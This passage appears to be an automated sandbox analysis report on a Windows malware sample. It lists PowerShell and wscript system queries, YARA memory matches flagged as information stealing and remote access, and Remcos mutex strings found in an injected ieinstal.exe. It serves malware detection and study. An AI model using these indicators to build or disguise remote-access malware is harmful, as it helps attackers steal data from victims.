Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA37.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CEBFB2B5FB1400592E8D3F6A040AE46.TMP"
Source: ieinstal.exe, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ieinstal.exe, 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011752798.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404217250.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_07D4CEE4 CreateNamedPipeW, 21_2_07D4CEE4

Stealing of Sensitive Information

Source: Yara match File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR
Source: ieinstal.exe, 0000001E.00000002.398100301334.00000000032E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Remcos_Mutex_Inj/
Source: ieinstal.exe, 00000021.00000002.398543567080.0000000003690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Remcos_Mutex_InjF